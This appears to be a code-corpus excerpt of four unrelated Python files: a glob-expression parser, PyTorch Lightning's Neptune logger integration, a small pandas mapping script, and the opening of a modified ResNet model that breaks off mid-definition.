from apps.gsekit.utils.expression_utils.exceptions import (
ExpressionSyntaxException,
ExpressionBaseException,
ExpressionParseException,
)
class MatchType:
WORD = 0
RANGE = 1
WORD_LIST = 2
BUILD_IN_ENUM = 3
BUILD_IN_EXCLUDE = 4
class BuildInChar:
COMMA = ","
HYPHEN = "-"
LEFT_BRACKET = "["
RIGHT_BRACKET = "]"
# 通配符
ASTERISK = "*"
EXCLAMATION = "!"
def parse_list2expr(value_list: List) -> str:
deduplicated = set(value_list)
if len(deduplicated) == 1:
return str(list(deduplicated)[0])
return "[" + ",".join([str(value) for value in compressed_list(deduplicated)]) + "]"
def compressed_list(value_list: iter) -> List[str]:
deduplicated = set([str(value) for value in value_list])
number_values = sorted([value for value in deduplicated if value.isdecimal()])
no_number_values = deduplicated - set(number_values)
left, right = 0, 0
str_range_set = set()
while right < len(number_values) - 1:
if int(number_values[right]) + 1 == int(number_values[right + 1]):
right = right + 1
else:
str_range_set.add(number_values[left] if left == right else f"{number_values[left]}-{number_values[right]}")
left, right = right + 1, right + 1
if len(number_values) != 0:
str_range_set.add(number_values[left] if left == right else f"{number_values[left]}-{number_values[right]}")
return list(str_range_set | no_number_values)
def expand_list_element(nested_list: Union[List[List], str]) -> List[str]:
"""将嵌套数组元素全部展开为一维数组"""
expand_str_list = []
for child in nested_list:
if isinstance(child, list):
expand_str_list.extend(expand_list_element(child))
else:
expand_str_list.append(child)
if isinstance(nested_list, str):
return [nested_list]
return expand_str_list
def get_range_scope(range_expression: str) -> Tuple[str, str]:
range_list = range_expression.split(BuildInChar.HYPHEN)
return range_list[0], range_list[1]
def is_range_format(expression: str) -> bool:
"""判断表达式是否为范围表达式"""
range_list = expression.split(BuildInChar.HYPHEN)
if len(range_list) != 2:
return False
return True
def is_single_alpha_range(range_expression: str) -> bool:
"""判断表达式是否为单字符范围"""
begin, end = get_range_scope(range_expression)
if begin.islower() != end.islower():
return False
if len(begin) == 1 and len(end) == 1 and begin.isalpha() and end.isalpha() and ord(begin) < ord(end):
return True
return False
def is_number_range(range_expression: str) -> bool:
"""判断表达式是否为数字范围"""
begin, end = get_range_scope(range_expression)
if begin.isdecimal() and end.isdecimal() and int(begin) < int(end):
return True
return False
def get_match_type(expression: str) -> int:
"""获取表达式类型"""
if expression.startswith(BuildInChar.LEFT_BRACKET) and expression.endswith(BuildInChar.RIGHT_BRACKET):
return MatchType.BUILD_IN_ENUM
elif expression.startswith(BuildInChar.EXCLAMATION):
return MatchType.BUILD_IN_EXCLUDE
elif BuildInChar.COMMA in expression:
return MatchType.WORD_LIST
elif BuildInChar.HYPHEN in expression:
if is_range_format(expression):
if is_single_alpha_range(expression) or is_number_range(expression):
return MatchType.RANGE
return MatchType.WORD
else:
return MatchType.WORD
def parse_enum_expression(enum_expression: str) -> List:
"""解析枚举表达式,获取枚举值"""
match_status_func = {
MatchType.WORD: lambda x: [x],
MatchType.BUILD_IN_ENUM: lambda x: [x],
MatchType.BUILD_IN_EXCLUDE: lambda x: f"[{x}]",
MatchType.WORD_LIST: parse_word_list_expression,
MatchType.RANGE: parse_range_expression,
}
match_type = get_match_type(enum_expression)
sub_expressions = match_status_func[match_type](enum_expression)
if match_type in [MatchType.WORD, MatchType.BUILD_IN_ENUM, MatchType.BUILD_IN_EXCLUDE]:
return match_status_func[match_type](enum_expression)
return [parse_enum_expression(sub_expression) for sub_expression in sub_expressions]
def parse_word_list_expression(word_list_expression: str) -> List[str]:
elements = word_list_expression.split(BuildInChar.COMMA)
return [element.strip() for element in elements]
def parse_range_expression(range_expression: str) -> List[str]:
if is_single_alpha_range(range_expression):
return [f"[{range_expression}]"]
if is_number_range(range_expression):
begin, end = get_range_scope(range_expression)
return range2re(int(begin), int(end))
raise ExpressionSyntaxException(_("范围表达式解析错误: {range_expression}").format(range_expression=range_expression))
def parse_exp2unix_shell_style_main(expression: str) -> List[str]:
"""将表达式解析为若干unix shell风格的匹配式"""
expressions_parsed = [""]
last_enum_end = -1
enum_begin = expression.find(BuildInChar.LEFT_BRACKET)
# 预处理枚举[...]
while enum_begin != -1:
enum_end = expression.find(BuildInChar.RIGHT_BRACKET, enum_begin)
if enum_end == -1:
raise ExpressionSyntaxException(
_("枚举表达式缺少`]`: {error_expression}").format(error_expression=expression[enum_begin:])
)
enum_expression = expression[enum_begin : enum_end + 1]
# 展开枚举值
enum_value_list = expand_list_element(parse_enum_expression(enum_expression[1:-1]))
# 枚举值添加到前缀末尾
sub_expressions_parsed = [
f"{expression[last_enum_end + 1: enum_begin]}{enum_value}" for enum_value in enum_value_list
]
# 与现有解析表达式叠加
expressions_parsed = [
f"{exp_prefix}{sub_exp}" for exp_prefix in expressions_parsed for sub_exp in sub_expressions_parsed
]
last_enum_end = enum_end
enum_begin = expression.find(BuildInChar.LEFT_BRACKET, enum_end)
expressions_parsed = [f"{exp_prefix}{expression[last_enum_end + 1:]}" for exp_prefix in expressions_parsed]
return expressions_parsed
def parse_exp2unix_shell_style(expression: str) -> List[str]:
try:
return list(set(parse_exp2unix_shell_style_main(expression)))
except ExpressionBaseException:
raise
except Exception as err:
msg = _("表达式[{expression}]解析异常:{err}".format(expression=expression, err=repr(err)))
logger.error(msg)
raise ExpressionParseException(msg) from err
|
py | 7df7f5599ce311663875a8c91067aea718df7385 | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Neptune Logger
--------------
"""
__all__ = [
"NeptuneLogger",
]
import logging
import os
import warnings
from argparse import Namespace
from functools import reduce
from typing import Any, Callable, Dict, Generator, Mapping, Optional, Sequence, Set, Union
from weakref import ReferenceType
import torch
from pytorch_lightning import __version__
from pytorch_lightning.callbacks.model_checkpoint import ModelCheckpoint
from pytorch_lightning.loggers.logger import Logger, rank_zero_experiment
from pytorch_lightning.utilities.imports import _NEPTUNE_AVAILABLE, _NEPTUNE_GREATER_EQUAL_0_9
from pytorch_lightning.utilities.logger import _add_prefix, _convert_params, _sanitize_callable_params
from pytorch_lightning.utilities.model_summary import ModelSummary
from pytorch_lightning.utilities.rank_zero import rank_zero_only
if _NEPTUNE_AVAILABLE and _NEPTUNE_GREATER_EQUAL_0_9:
try:
from neptune import new as neptune
from neptune.new.exceptions import NeptuneLegacyProjectException, NeptuneOfflineModeFetchException
from neptune.new.run import Run
from neptune.new.types import File as NeptuneFile
except ModuleNotFoundError:
import neptune
from neptune.exceptions import NeptuneLegacyProjectException, NeptuneOfflineModeFetchException
from neptune.run import Run
from neptune.types import File as NeptuneFile
else:
# needed for test mocks, and function signatures
neptune, Run, NeptuneFile = None, None, None
log = logging.getLogger(__name__)
_INTEGRATION_VERSION_KEY = "source_code/integrations/pytorch-lightning"
# kwargs used in previous NeptuneLogger version, now deprecated
_LEGACY_NEPTUNE_INIT_KWARGS = [
"project_name",
"offline_mode",
"experiment_name",
"experiment_id",
"params",
"properties",
"upload_source_files",
"abort_callback",
"logger",
"upload_stdout",
"upload_stderr",
"send_hardware_metrics",
"run_monitoring_thread",
"handle_uncaught_exceptions",
"git_info",
"hostname",
"notebook_id",
"notebook_path",
]
# kwargs used in legacy NeptuneLogger from neptune-pytorch-lightning package
_LEGACY_NEPTUNE_LOGGER_KWARGS = [
"base_namespace",
"close_after_fit",
]
class NeptuneLogger(Logger):
r"""
Log using `Neptune <https://neptune.ai>`_.
Install it with pip:
.. code-block:: bash
pip install neptune-client
or conda:
.. code-block:: bash
conda install -c conda-forge neptune-client
**Quickstart**
Pass NeptuneLogger instance to the Trainer to log metadata with Neptune:
.. code-block:: python
from pytorch_lightning import Trainer
from pytorch_lightning.loggers import NeptuneLogger
neptune_logger = NeptuneLogger(
api_key="ANONYMOUS", # replace with your own
project="common/pytorch-lightning-integration", # format "<WORKSPACE/PROJECT>"
tags=["training", "resnet"], # optional
)
trainer = Trainer(max_epochs=10, logger=neptune_logger)
**How to use NeptuneLogger?**
Use the logger anywhere in your :class:`~pytorch_lightning.core.lightning.LightningModule` as follows:
.. code-block:: python
from neptune.new.types import File
from pytorch_lightning import LightningModule
class LitModel(LightningModule):
def training_step(self, batch, batch_idx):
# log metrics
acc = ...
self.log("train/loss", loss)
def any_lightning_module_function_or_hook(self):
# log images
img = ...
self.logger.experiment["train/misclassified_images"].log(File.as_image(img))
# generic recipe
metadata = ...
self.logger.experiment["your/metadata/structure"].log(metadata)
Note that syntax: ``self.logger.experiment["your/metadata/structure"].log(metadata)`` is specific to Neptune
and it extends logger capabilities. Specifically, it allows you to log various types of metadata
like scores, files, images, interactive visuals, CSVs, etc.
Refer to the `Neptune docs <https://docs.neptune.ai/you-should-know/logging-metadata#essential-logging-methods>`_
for more detailed explanations.
You can also use regular logger methods ``log_metrics()``, and ``log_hyperparams()`` with NeptuneLogger
as these are also supported.
**Log after fitting or testing is finished**
You can log objects after the fitting or testing methods are finished:
.. code-block:: python
neptune_logger = NeptuneLogger(project="common/pytorch-lightning-integration")
trainer = pl.Trainer(logger=neptune_logger)
model = ...
datamodule = ...
trainer.fit(model, datamodule=datamodule)
trainer.test(model, datamodule=datamodule)
# Log objects after `fit` or `test` methods
# model summary
neptune_logger.log_model_summary(model=model, max_depth=-1)
# generic recipe
metadata = ...
neptune_logger.experiment["your/metadata/structure"].log(metadata)
**Log model checkpoints**
If you have :class:`~pytorch_lightning.callbacks.ModelCheckpoint` configured,
Neptune logger automatically logs model checkpoints.
Model weights will be uploaded to the: "model/checkpoints" namespace in the Neptune Run.
You can disable this option:
.. code-block:: python
neptune_logger = NeptuneLogger(project="common/pytorch-lightning-integration", log_model_checkpoints=False)
**Pass additional parameters to the Neptune run**
You can also pass ``neptune_run_kwargs`` to specify the run in the greater detail, like ``tags`` or ``description``:
.. testcode::
from pytorch_lightning import Trainer
from pytorch_lightning.loggers import NeptuneLogger
neptune_logger = NeptuneLogger(
project="common/pytorch-lightning-integration",
name="lightning-run",
description="mlp quick run with pytorch-lightning",
tags=["mlp", "quick-run"],
)
trainer = Trainer(max_epochs=3, logger=neptune_logger)
Check `run documentation <https://docs.neptune.ai/essentials/api-reference/run>`_
for more info about additional run parameters.
**Details about Neptune run structure**
Runs can be viewed as nested dictionary-like structures that you can define in your code.
Thanks to this you can easily organize your metadata in a way that is most convenient for you.
The hierarchical structure that you apply to your metadata will be reflected later in the UI.
You can organize this way any type of metadata - images, parameters, metrics, model checkpoint, CSV files, etc.
See Also:
- Read about
`what object you can log to Neptune <https://docs.neptune.ai/you-should-know/what-can-you-log-and-display>`_.
- Check `example run <https://app.neptune.ai/o/common/org/pytorch-lightning-integration/e/PTL-1/all>`_
with multiple types of metadata logged.
- For more detailed info check
`user guide <https://docs.neptune.ai/integrations-and-supported-tools/model-training/pytorch-lightning>`_.
Args:
api_key: Optional.
Neptune API token, found on https://neptune.ai upon registration.
Read: `how to find and set Neptune API token <https://docs.neptune.ai/administration/security-and-privacy/
how-to-find-and-set-neptune-api-token>`_.
It is recommended to keep it in the `NEPTUNE_API_TOKEN`
environment variable and then you can drop ``api_key=None``.
project: Optional.
Name of a project in a form of "my_workspace/my_project" for example "tom/mask-rcnn".
If ``None``, the value of `NEPTUNE_PROJECT` environment variable will be taken.
You need to create the project in https://neptune.ai first.
name: Optional. Editable name of the run.
Run name appears in the "all metadata/sys" section in Neptune UI.
run: Optional. Default is ``None``. The Neptune ``Run`` object.
If specified, this `Run`` will be used for logging, instead of a new Run.
When run object is passed you can't specify other neptune properties.
log_model_checkpoints: Optional. Default is ``True``. Log model checkpoint to Neptune.
Works only if ``ModelCheckpoint`` is passed to the ``Trainer``.
prefix: Optional. Default is ``"training"``. Root namespace for all metadata logging.
\**neptune_run_kwargs: Additional arguments like ``tags``, ``description``, ``capture_stdout``, etc.
used when run is created.
Raises:
ModuleNotFoundError:
If required Neptune package in version >=0.9 is not installed on the device.
TypeError:
If configured project has not been migrated to new structure yet.
ValueError:
If argument passed to the logger's constructor is incorrect.
"""
LOGGER_JOIN_CHAR = "/"
PARAMETERS_KEY = "hyperparams"
ARTIFACTS_KEY = "artifacts"
def __init__(
self,
*, # force users to call `NeptuneLogger` initializer with `kwargs`
api_key: Optional[str] = None,
project: Optional[str] = None,
name: Optional[str] = None,
run: Optional["Run"] = None,
log_model_checkpoints: Optional[bool] = True,
prefix: str = "training",
agg_key_funcs: Optional[Mapping[str, Callable[[Sequence[float]], float]]] = None,
agg_default_func: Optional[Callable[[Sequence[float]], float]] = None,
**neptune_run_kwargs,
):
# verify if user passed proper init arguments
self._verify_input_arguments(api_key, project, name, run, neptune_run_kwargs)
if neptune is None:
raise ModuleNotFoundError(
"You want to use the `Neptune` logger which is not installed yet, install it with"
" `pip install neptune-client`."
)
super().__init__(agg_key_funcs=agg_key_funcs, agg_default_func=agg_default_func)
self._log_model_checkpoints = log_model_checkpoints
self._prefix = prefix
self._run_name = name
self._project_name = project
self._api_key = api_key
self._run_instance = run
self._neptune_run_kwargs = neptune_run_kwargs
self._run_short_id = None
if self._run_instance is not None:
self._retrieve_run_data()
# make sure that we've log integration version for outside `Run` instances
self._run_instance[_INTEGRATION_VERSION_KEY] = __version__
def _retrieve_run_data(self):
try:
self._run_instance.wait()
self._run_short_id = self._run_instance["sys/id"].fetch()
self._run_name = self._run_instance["sys/name"].fetch()
except NeptuneOfflineModeFetchException:
self._run_short_id = "OFFLINE"
self._run_name = "offline-name"
@property
def _neptune_init_args(self):
args = {}
# Backward compatibility in case of previous version retrieval
try:
args = self._neptune_run_kwargs
except AttributeError:
pass
if self._project_name is not None:
args["project"] = self._project_name
if self._api_key is not None:
args["api_token"] = self._api_key
if self._run_short_id is not None:
args["run"] = self._run_short_id
# Backward compatibility in case of previous version retrieval
try:
if self._run_name is not None:
args["name"] = self._run_name
except AttributeError:
pass
return args
def _construct_path_with_prefix(self, *keys) -> str:
"""Return sequence of keys joined by `LOGGER_JOIN_CHAR`, started with `_prefix` if defined."""
if self._prefix:
return self.LOGGER_JOIN_CHAR.join([self._prefix, *keys])
return self.LOGGER_JOIN_CHAR.join(keys)
@staticmethod
def _verify_input_arguments(
api_key: Optional[str],
project: Optional[str],
name: Optional[str],
run: Optional["Run"],
neptune_run_kwargs: dict,
):
legacy_kwargs_msg = (
"Following kwargs are deprecated: {legacy_kwargs}.\n"
"If you are looking for the Neptune logger using legacy Python API,"
" it's still available as part of neptune-contrib package:\n"
" - https://docs-legacy.neptune.ai/integrations/pytorch_lightning.html\n"
"The NeptuneLogger was re-written to use the neptune.new Python API\n"
" - https://neptune.ai/blog/neptune-new\n"
" - https://docs.neptune.ai/integrations-and-supported-tools/model-training/pytorch-lightning\n"
"You should use arguments accepted by either NeptuneLogger.init() or neptune.init()"
)
# check if user used legacy kwargs expected in `NeptuneLegacyLogger`
used_legacy_kwargs = [
legacy_kwarg for legacy_kwarg in neptune_run_kwargs if legacy_kwarg in _LEGACY_NEPTUNE_INIT_KWARGS
]
if used_legacy_kwargs:
raise ValueError(legacy_kwargs_msg.format(legacy_kwargs=used_legacy_kwargs))
# check if user used legacy kwargs expected in `NeptuneLogger` from neptune-pytorch-lightning package
used_legacy_neptune_kwargs = [
legacy_kwarg for legacy_kwarg in neptune_run_kwargs if legacy_kwarg in _LEGACY_NEPTUNE_LOGGER_KWARGS
]
if used_legacy_neptune_kwargs:
raise ValueError(legacy_kwargs_msg.format(legacy_kwargs=used_legacy_neptune_kwargs))
# check if user passed new client `Run` object
if run is not None and not isinstance(run, Run):
raise ValueError(
"Run parameter expected to be of type `neptune.new.Run`.\n"
"If you are looking for the Neptune logger using legacy Python API,"
" it's still available as part of neptune-contrib package:\n"
" - https://docs-legacy.neptune.ai/integrations/pytorch_lightning.html\n"
"The NeptuneLogger was re-written to use the neptune.new Python API\n"
" - https://neptune.ai/blog/neptune-new\n"
" - https://docs.neptune.ai/integrations-and-supported-tools/model-training/pytorch-lightning\n"
)
# check if user passed redundant neptune.init arguments when passed run
any_neptune_init_arg_passed = any(arg is not None for arg in [api_key, project, name]) or neptune_run_kwargs
if run is not None and any_neptune_init_arg_passed:
raise ValueError(
"When an already initialized run object is provided"
" you can't provide other neptune.init() parameters.\n"
)
def __getstate__(self):
state = self.__dict__.copy()
# Run instance can't be pickled
state["_run_instance"] = None
return state
def __setstate__(self, state):
self.__dict__ = state
self._run_instance = neptune.init(**self._neptune_init_args)
@property
@rank_zero_experiment
def experiment(self) -> Run:
r"""
Actual Neptune run object. Allows you to use neptune logging features in your
:class:`~pytorch_lightning.core.lightning.LightningModule`.
Example::
class LitModel(LightningModule):
def training_step(self, batch, batch_idx):
# log metrics
acc = ...
self.logger.experiment["train/acc"].log(acc)
# log images
img = ...
self.logger.experiment["train/misclassified_images"].log(File.as_image(img))
Note that syntax: ``self.logger.experiment["your/metadata/structure"].log(metadata)``
is specific to Neptune and it extends logger capabilities.
Specifically, it allows you to log various types of metadata like scores, files,
images, interactive visuals, CSVs, etc. Refer to the
`Neptune docs <https://docs.neptune.ai/you-should-know/logging-metadata#essential-logging-methods>`_
for more detailed explanations.
You can also use regular logger methods ``log_metrics()``, and ``log_hyperparams()``
with NeptuneLogger as these are also supported.
"""
return self.run
@property
@rank_zero_experiment
def run(self) -> Run:
try:
if not self._run_instance:
self._run_instance = neptune.init(**self._neptune_init_args)
self._retrieve_run_data()
# make sure that we've log integration version for newly created
self._run_instance[_INTEGRATION_VERSION_KEY] = __version__
return self._run_instance
except NeptuneLegacyProjectException as e:
raise TypeError(
f"Project {self._project_name} has not been migrated to the new structure."
" You can still integrate it with the Neptune logger using legacy Python API"
" available as part of neptune-contrib package:"
" https://docs-legacy.neptune.ai/integrations/pytorch_lightning.html\n"
) from e
@rank_zero_only
def log_hyperparams(self, params: Union[Dict[str, Any], Namespace]) -> None: # skipcq: PYL-W0221
r"""
Log hyper-parameters to the run.
Hyperparams will be logged under the "<prefix>/hyperparams" namespace.
Note:
You can also log parameters by directly using the logger instance:
``neptune_logger.experiment["model/hyper-parameters"] = params_dict``.
In this way you can keep hierarchical structure of the parameters.
Args:
params: `dict`.
Python dictionary structure with parameters.
Example::
from pytorch_lightning.loggers import NeptuneLogger
PARAMS = {
"batch_size": 64,
"lr": 0.07,
"decay_factor": 0.97
}
neptune_logger = NeptuneLogger(
api_key="ANONYMOUS",
project="common/pytorch-lightning-integration"
)
neptune_logger.log_hyperparams(PARAMS)
"""
params = _convert_params(params)
params = _sanitize_callable_params(params)
parameters_key = self.PARAMETERS_KEY
parameters_key = self._construct_path_with_prefix(parameters_key)
self.run[parameters_key] = params
@rank_zero_only
def log_metrics(self, metrics: Dict[str, Union[torch.Tensor, float]], step: Optional[int] = None) -> None:
"""Log metrics (numeric values) in Neptune runs.
Args:
metrics: Dictionary with metric names as keys and measured quantities as values.
step: Step number at which the metrics should be recorded, currently ignored.
"""
if rank_zero_only.rank != 0:
raise ValueError("run tried to log from global_rank != 0")
metrics = _add_prefix(metrics, self._prefix, self.LOGGER_JOIN_CHAR)
for key, val in metrics.items():
# `step` is ignored because Neptune expects strictly increasing step values which
# Lightning does not always guarantee.
self.run[key].log(val)
@rank_zero_only
def finalize(self, status: str) -> None:
if status:
self.run[self._construct_path_with_prefix("status")] = status
super().finalize(status)
@property
def save_dir(self) -> Optional[str]:
"""Gets the save directory of the experiment which in this case is ``None`` because Neptune does not save
locally.
Returns:
the root directory where experiment logs get saved
"""
return os.path.join(os.getcwd(), ".neptune")
@rank_zero_only
def log_model_summary(self, model, max_depth=-1):
model_str = str(ModelSummary(model=model, max_depth=max_depth))
self.run[self._construct_path_with_prefix("model/summary")] = neptune.types.File.from_content(
content=model_str, extension="txt"
)
@rank_zero_only
def after_save_checkpoint(self, checkpoint_callback: "ReferenceType[ModelCheckpoint]") -> None:
"""Automatically log checkpointed model. Called after model checkpoint callback saves a new checkpoint.
Args:
checkpoint_callback: the model checkpoint callback instance
"""
if not self._log_model_checkpoints:
return
file_names = set()
checkpoints_namespace = self._construct_path_with_prefix("model/checkpoints")
# save last model
if checkpoint_callback.last_model_path:
model_last_name = self._get_full_model_name(checkpoint_callback.last_model_path, checkpoint_callback)
file_names.add(model_last_name)
self.run[f"{checkpoints_namespace}/{model_last_name}"].upload(checkpoint_callback.last_model_path)
# save best k models
for key in checkpoint_callback.best_k_models.keys():
model_name = self._get_full_model_name(key, checkpoint_callback)
file_names.add(model_name)
self.run[f"{checkpoints_namespace}/{model_name}"].upload(key)
# log best model path and checkpoint
if checkpoint_callback.best_model_path:
self.run[self._construct_path_with_prefix("model/best_model_path")] = checkpoint_callback.best_model_path
model_name = self._get_full_model_name(checkpoint_callback.best_model_path, checkpoint_callback)
file_names.add(model_name)
self.run[f"{checkpoints_namespace}/{model_name}"].upload(checkpoint_callback.best_model_path)
# remove old models logged to experiment if they are not part of best k models at this point
if self.run.exists(checkpoints_namespace):
exp_structure = self.run.get_structure()
uploaded_model_names = self._get_full_model_names_from_exp_structure(exp_structure, checkpoints_namespace)
for file_to_drop in list(uploaded_model_names - file_names):
del self.run[f"{checkpoints_namespace}/{file_to_drop}"]
# log best model score
if checkpoint_callback.best_model_score:
self.run[self._construct_path_with_prefix("model/best_model_score")] = (
checkpoint_callback.best_model_score.cpu().detach().numpy()
)
@staticmethod
def _get_full_model_name(model_path: str, checkpoint_callback: "ReferenceType[ModelCheckpoint]") -> str:
"""Returns model name which is string `model_path` appended to `checkpoint_callback.dirpath`."""
expected_model_path = f"{checkpoint_callback.dirpath}{os.path.sep}"
if not model_path.startswith(expected_model_path):
raise ValueError(f"{model_path} was expected to start with {expected_model_path}.")
# Remove extension from filepath
filepath, _ = os.path.splitext(model_path[len(expected_model_path) :])
return filepath
@classmethod
def _get_full_model_names_from_exp_structure(cls, exp_structure: dict, namespace: str) -> Set[str]:
"""Returns all paths to properties which were already logged in `namespace`"""
structure_keys = namespace.split(cls.LOGGER_JOIN_CHAR)
uploaded_models_dict = reduce(lambda d, k: d[k], [exp_structure, *structure_keys])
return set(cls._dict_paths(uploaded_models_dict))
@classmethod
def _dict_paths(cls, d: dict, path_in_build: str = None) -> Generator:
for k, v in d.items():
path = f"{path_in_build}/{k}" if path_in_build is not None else k
if not isinstance(v, dict):
yield path
else:
yield from cls._dict_paths(v, path)
@property
def name(self) -> str:
"""Return the experiment name or 'offline-name' when exp is run in offline mode."""
return self._run_name
@property
def version(self) -> str:
"""Return the experiment version.
It's Neptune Run's short_id
"""
return self._run_short_id
@staticmethod
def _signal_deprecated_api_usage(f_name, sample_code, raise_exception=False):
msg_suffix = (
f"If you are looking for the Neptune logger using legacy Python API,"
f" it's still available as part of neptune-contrib package:\n"
f" - https://docs-legacy.neptune.ai/integrations/pytorch_lightning.html\n"
f"The NeptuneLogger was re-written to use the neptune.new Python API\n"
f" - https://neptune.ai/blog/neptune-new\n"
f" - https://docs.neptune.ai/integrations-and-supported-tools/model-training/pytorch-lightning\n"
f"Instead of `logger.{f_name}` you can use:\n"
f"\t{sample_code}"
)
if not raise_exception:
warnings.warn(
"The function you've used is deprecated in v1.5.0 and will be removed in v1.7.0. " + msg_suffix
)
else:
raise ValueError("The function you've used is deprecated.\n" + msg_suffix)
@rank_zero_only
def log_metric(self, metric_name: str, metric_value: Union[torch.Tensor, float, str], step: Optional[int] = None):
key = f"{self._prefix}/{metric_name}"
self._signal_deprecated_api_usage("log_metric", f"logger.run['{key}'].log(42)")
if torch.is_tensor(metric_value):
metric_value = metric_value.cpu().detach()
self.run[key].log(metric_value, step=step)
@rank_zero_only
def log_text(self, log_name: str, text: str, step: Optional[int] = None) -> None:
key = f"{self._prefix}/{log_name}"
self._signal_deprecated_api_usage("log_text", f"logger.run['{key}].log('text')")
self.run[key].log(str(text), step=step)
@rank_zero_only
def log_image(self, log_name: str, image: Union[str, Any], step: Optional[int] = None) -> None:
key = f"{self._prefix}/{log_name}"
self._signal_deprecated_api_usage("log_image", f"logger.run['{key}'].log(File('path_to_image'))")
if isinstance(image, str):
# if `img` is path to file, convert it to file object
image = NeptuneFile(image)
self.run[key].log(image, step=step)
@rank_zero_only
def log_artifact(self, artifact: str, destination: Optional[str] = None) -> None:
key = f"{self._prefix}/{self.ARTIFACTS_KEY}/{artifact}"
self._signal_deprecated_api_usage("log_artifact", f"logger.run['{key}].log('path_to_file')")
self.run[key].log(destination)
def set_property(self, *args, **kwargs):
self._signal_deprecated_api_usage(
"log_artifact", f"logger.run['{self._prefix}/{self.PARAMETERS_KEY}/key'].log(value)", raise_exception=True
)
def append_tags(self, *args, **kwargs):
self._signal_deprecated_api_usage(
"append_tags", "logger.run['sys/tags'].add(['foo', 'bar'])", raise_exception=True
)
|
py | 7df7f58be9af32768db9ebc4cfda7fb104c1dde2 | #!/usr/bin/python
import pandas as pd
import numpy as np
orig_file = pd.read_csv("/projectnb/bf528/users/tinman/Project4/datacurator/txp2gene_pre.tsv", sep='|')
file = pd.DataFrame(orig_file).to_numpy()
txp2gene = open("txp2gene_v2.txt", "w")
for line in file:
txp2gene.write("ENST00000456328.2\tENSG00000223972.5\n"+str(line[0])+'\t'+str(line[1])+'\n')
txp2gene.close()
|
py | 7df7f6730a6a98771ab27d908658deb373233069 | # source code from pytorch resnet library
# improved method over vanilla resnet
# added dropout and remove last two layers(layer3 and layer4)
import torch
from torch import Tensor
import torch.nn as nn
from .utils.net_utils import load_state_dict_from_url
from typing import Type, Any, Callable, Union, List, Optional
__all__ = ['ResNet', 'improved_resnet18', 'improved_resnet34', 'improved_resnet50', 'improved_resnet101',
'improved_resnet152', 'improved_resnext50_32x4d', 'improved_resnext101_32x8d',
'improved_wide_resnet50_2', 'improved_wide_resnet101_2']
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-f37072fd.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-b627a593.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-0676ba61.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-63fe2227.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-394f9c45.pth',
'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',
'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',
'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',
'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',
}
def conv3x3(in_planes: int, out_planes: int, stride: int = 1, groups: int = 1, dilation: int = 1) -> nn.Conv2d:
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=dilation, groups=groups, bias=False, dilation=dilation)
def conv1x1(in_planes: int, out_planes: int, stride: int = 1) -> nn.Conv2d:
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion: int = 1
def __init__(
self,
inplanes: int,
planes: int,
stride: int = 1,
downsample: Optional[nn.Module] = None,
groups: int = 1,
base_width: int = 64,
dilation: int = 1,
norm_layer: Optional[Callable[..., nn.Module]] = None
) -> None:
super(BasicBlock, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
if groups != 1 or base_width != 64:
raise ValueError('BasicBlock only supports groups=1 and base_width=64')
if dilation > 1:
raise NotImplementedError("Dilation > 1 not supported in BasicBlock")
# Both self.conv1 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = norm_layer(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = norm_layer(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x: Tensor) -> Tensor:
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class Bottleneck(nn.Module):
# Bottleneck in torchvision places the stride for downsampling at 3x3 convolution(self.conv2)
# while original implementation places the stride at the first 1x1 convolution(self.conv1)
# according to "Deep residual learning for image recognition"https://arxiv.org/abs/1512.03385.
# This variant is also known as ResNet V1.5 and improves accuracy according to
# https://ngc.nvidia.com/catalog/model-scripts/nvidia:resnet_50_v1_5_for_pytorch.
expansion: int = 4
def __init__(
self,
inplanes: int,
planes: int,
stride: int = 1,
downsample: Optional[nn.Module] = None,
groups: int = 1,
base_width: int = 64,
dilation: int = 1,
norm_layer: Optional[Callable[..., nn.Module]] = None
) -> None:
super(Bottleneck, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
width = int(planes * (base_width / 64.)) * groups
# Both self.conv2 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv1x1(inplanes, width)
self.bn1 = norm_layer(width)
self.conv2 = conv3x3(width, width, stride, groups, dilation)
self.bn2 = norm_layer(width)
self.conv3 = conv1x1(width, planes * self.expansion)
self.bn3 = norm_layer(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x: Tensor) -> Tensor:
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(
self,
block: Type[Union[BasicBlock, Bottleneck]],
layers: List[int],
num_classes: int = 1000,
zero_init_residual: bool = False,
groups: int = 1,
width_per_group: int = 64,
